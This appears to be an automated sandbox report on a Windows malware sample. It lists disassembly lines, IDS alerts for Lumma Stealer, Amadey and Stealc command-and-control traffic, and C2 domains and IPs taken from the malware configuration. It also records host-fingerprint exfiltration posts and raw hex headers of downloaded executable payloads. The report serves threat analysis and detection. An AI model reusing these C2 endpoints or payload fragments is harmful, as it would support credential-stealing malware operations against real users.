Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], A269EEEFh	8_2_004361D0
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 4x nop then mov edx, eax	8_2_004229DD
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], A8F779E4h	8_2_004229DD
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 7A5C62DDh	8_2_0041918D
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], B430E561h	8_2_0041918D
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 4x nop then lea ebx, dword ptr [edx+000000F4h]	8_2_00428992
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 4x nop then movzx ebx, cx	8_2_0042B260
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 4x nop then mov byte ptr [edi], cl	8_2_0042B260
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 4x nop then movzx edx, byte ptr [ecx]	8_2_0042B260
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx+5D4F6E12h]	8_2_00422270
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], B430E561h	8_2_00422270
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 4x nop then mov ecx, eax	8_2_00435A80
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-7947E592h]	8_2_004152BB
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-6A594FF8h]	8_2_00419364
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 4x nop then mov word ptr [edx], ax	8_2_00419364
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 4x nop then mov word ptr [edi], cx	8_2_00419364
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 4x nop then movzx ebx, cx	8_2_0042AB7E
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 4x nop then mov byte ptr [edi], cl	8_2_0042AB7E
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 4x nop then movzx edx, byte ptr [ecx]	8_2_0042AB7E
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 4x nop then movzx edi, byte ptr [esp+edx+03h]	8_2_00409300
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 4x nop then mov dword ptr [esi], FFFFFFFFh	8_2_00402300
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 4x nop then cmp dword ptr [edx+ecx*8], 2298EE00h	8_2_0043D310
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 4x nop then mov byte ptr [edi], al	8_2_0042B327
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 4x nop then movzx ebx, cx	8_2_0042AB32
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 4x nop then mov byte ptr [edi], cl	8_2_0042AB32
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 4x nop then movzx edx, byte ptr [ecx]	8_2_0042AB32
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+ebp-000000D4h]	8_2_0041CB30
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 4x nop then mov byte ptr [edi], al	8_2_0042BBCC
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 4x nop then movzx edi, byte ptr [ecx+esi]	8_2_00402B90
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+20h]	8_2_00407410
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 4x nop then movzx ecx, word ptr [ebp+edi*4+00h]	8_2_00407410
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 67F3D776h	8_2_00436410
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 4x nop then cmp dword ptr [ebx+esi*8], 22FD5D1Bh	8_2_00436410
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 4x nop then test eax, eax	8_2_00436410
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 7FC6CA61h	8_2_00415420
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 4x nop then movzx eax, word ptr [ebp+00h]	8_2_00436CD8
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 4x nop then cmp dword ptr [ebx+esi*8], 1E7AC822h	8_2_00422CA2
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 4x nop then mov edi, dword ptr [esp+44h]	8_2_0042855A
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+34h]	8_2_0041B569
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 4x nop then push dword ptr [esp+04h]	8_2_0040A500
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 4x nop then movzx esi, byte ptr [ebp+ecx-4Ch]	8_2_00424D27
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 4x nop then mov word ptr [ebp+00h], cx	8_2_00428538
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 4x nop then mov byte ptr [edi], al	8_2_0042B5BC
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 4x nop then mov byte ptr [edi], al	8_2_0042B5BC
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 4x nop then mov edx, ecx	8_2_0042B5BC
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+ecx-13h]	8_2_0043BE60
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 4x nop then mov byte ptr [edi], cl	8_2_0042BE04
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 4x nop then mov word ptr [ebp+00h], cx	8_2_0042861A
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 4x nop then mov byte ptr [edi], al	8_2_0042AE26
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 4x nop then mov byte ptr [edi], al	8_2_0042AE26
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 4x nop then mov byte ptr [edi], al	8_2_0042AE26
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	8_2_00429EE0
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 4x nop then mov byte ptr [edi], al	8_2_0042B5B7
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 4x nop then mov byte ptr [edi], al	8_2_0042B5B7
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 4x nop then mov edx, ecx	8_2_0042B5B7
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 4x nop then jmp dword ptr [004427CCh]	8_2_004156A5
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h	8_2_0043CF00
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 4x nop then mov esi, ecx	8_2_00409710
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax+17h]	8_2_00409710
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 4x nop then mov edx, ecx	8_2_00409710
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+20h]	8_2_00416F3C
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+edi+20h]	8_2_00416F3C
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 4x nop then mov byte ptr [edi], cl	8_2_0042BFCE
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 4x nop then cmp dword ptr [edx+ecx*8], 5D9C2DBEh	8_2_00413FF0
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx]	8_2_00438FB0

Source: chrome.exe	Memory has grown: Private usage: 1MB later: 41MB
Source: firefox.exe	Memory has grown: Private usage: 1MB later: 181MB

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2058212 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bellflamre .click) : 192.168.2.4:59157 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.4:49748 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2058222 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (immureprech .biz) : 192.168.2.4:51371 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058213 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (bellflamre .click in TLS SNI) : 192.168.2.4:49771 -> 104.21.67.145:443
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49772 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.4:49759
Source: Network traffic	Suricata IDS: 2058223 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (immureprech .biz in TLS SNI) : 192.168.2.4:49783 -> 104.21.22.222:443
Source: Network traffic	Suricata IDS: 2058214 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (deafeninggeh .biz) : 192.168.2.4:60444 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49794 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2058220 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (effecterectz .xyz) : 192.168.2.4:62630 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058218 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (diffuculttan .xyz) : 192.168.2.4:65102 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058210 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (awake-weaves .cyou) : 192.168.2.4:60752 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058236 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wrathful-jammy .cyou) : 192.168.2.4:59059 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058216 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (debonairnukk .xyz) : 192.168.2.4:49476 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058226 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sordid-snaked .cyou) : 192.168.2.4:52224 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49823 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49834 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2058215 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (deafeninggeh .biz in TLS SNI) : 192.168.2.4:49789 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.4:49834 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.215.113.206:80 -> 192.168.2.4:49834
Source: Network traffic	Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.4:49834 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.215.113.206:80 -> 192.168.2.4:49834
Source: Network traffic	Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.4:49834 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49853 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49905 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49936 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2057945 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (se-blurry .biz) : 192.168.2.4:49239 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057983 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (se-blurry .biz) : 192.168.2.4:49239 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057949 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (zinc-sneark .biz) : 192.168.2.4:62810 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057981 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (zinc-sneark .biz) : 192.168.2.4:62810 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057931 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (formy-spill .biz) : 192.168.2.4:50441 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057977 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (formy-spill .biz) : 192.168.2.4:50441 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057925 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (covery-mover .biz) : 192.168.2.4:49378 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057973 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (covery-mover .biz) : 192.168.2.4:49378 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057929 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dwell-exclaim .biz) : 192.168.2.4:51431 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057979 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dwell-exclaim .biz) : 192.168.2.4:51431 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057943 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (print-vexer .biz) : 192.168.2.4:59192 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057971 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (print-vexer .biz) : 192.168.2.4:59192 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057935 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (impend-differ .biz) : 192.168.2.4:63066 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057969 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (impend-differ .biz) : 192.168.2.4:63066 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49956 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2057927 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dare-curbys .biz) : 192.168.2.4:56967 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057975 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dare-curbys .biz) : 192.168.2.4:56967 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2044623 - Severity 1 - ET MALWARE Amadey Bot Activity (POST) : 192.168.2.4:50007 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:50021 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:50085 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.4:50241
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:50243 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:50245 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:50246 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:50248 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:50250 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.4:50294 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:50295 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49771 -> 104.21.67.145:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49771 -> 104.21.67.145:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49783 -> 104.21.22.222:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49783 -> 104.21.22.222:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49789 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49789 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.4:49953 -> 23.55.153.106:443
Source: Network traffic	Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.4:49804 -> 23.55.153.106:443
Source: Network traffic	Suricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST : 192.168.2.4:49989 -> 116.203.10.31:443
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 116.203.10.31:443 -> 192.168.2.4:49989
Source: Network traffic	Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 116.203.10.31:443 -> 192.168.2.4:49996
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49941 -> 104.21.79.7:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49941 -> 104.21.79.7:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://185.215.113.206/c4becf79229cb002.php
Source: Malware configuration extractor	URLs: immureprech.biz
Source: Malware configuration extractor	URLs: awake-weaves.cyou
Source: Malware configuration extractor	URLs: sordid-snaked.cyou
Source: Malware configuration extractor	URLs: bellflamre.click
Source: Malware configuration extractor	URLs: diffuculttan.xyz
Source: Malware configuration extractor	URLs: wrathful-jammy.cyou
Source: Malware configuration extractor	URLs: effecterectz.xyz
Source: Malware configuration extractor	URLs: debonairnukk.xyz
Source: Malware configuration extractor	URLs: deafeninggeh.biz
Source: Malware configuration extractor	IPs: 185.215.113.43

Performs DNS queries to domains with low reputation

Source:	DNS query: effecterectz.xyz
Source:	DNS query: diffuculttan.xyz
Source:	DNS query: debonairnukk.xyz

Tries to resolve many domain names, but no domain seems valid

Source: unknown	DNS traffic detected: query: impend-differ.biz replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: formy-spill.biz replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: zinc-sneark.biz replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: se-blurry.biz replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: effecterectz.xyz replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: wrathful-jammy.cyou replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: dwell-exclaim.biz replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: print-vexer.biz replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: dare-curbys.biz replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: debonairnukk.xyz replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: diffuculttan.xyz replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: sordid-snaked.cyou replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: covery-mover.biz replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: awake-weaves.cyou replaycode: Name error (3)

Source: unknown

Network traffic detected: DNS query count 41

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 14 Dec 2024 11:56:09 GMTContent-Type: application/octet-streamContent-Length: 406528Last-Modified: Sat, 14 Dec 2024 10:06:57 GMTConnection: keep-aliveETag: "675d58c1-63400"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 62 49 5c 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 00 00 0e 01 00 00 9e 00 00 00 00 00 00 5c 4c 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 90 06 00 00 06 00 00 00 00 00 00 03 00 40 83 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 44 7e 01 00 28 00 00 00 00 d0 01 00 e8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 01 00 fc 12 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 28 01 00 c0 00 00 00 00 00 00 00 00 00 00 00 ac 7f 01 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 15 0c 01 00 00 10 00 00 00 0e 01 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 72 00 00 00 20 01 00 00 74 00 00 00 14 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 10 1c 00 00 00 a0 01 00 00 12 00 00 00 88 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 4f 4f 00 00 00 00 00 04 00 00 00 00 c0 01 00 00 02 00 00 00 9a 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 e8 00 00 00 00 d0 01 00 00 02 00 00 00 9c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 fc 12 00 00 00 e0 01 00 00 14 00 00 00 9e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 62 73 73 00 00 00 00 00 82 04 00 00 00 02 00 00 82 04 00 00 b2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 14 Dec 2024 11:56:15 GMTContent-Type: application/octet-streamContent-Length: 970240Last-Modified: Sat, 14 Dec 2024 10:55:25 GMTConnection: keep-aliveETag: "675d641d-ece00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 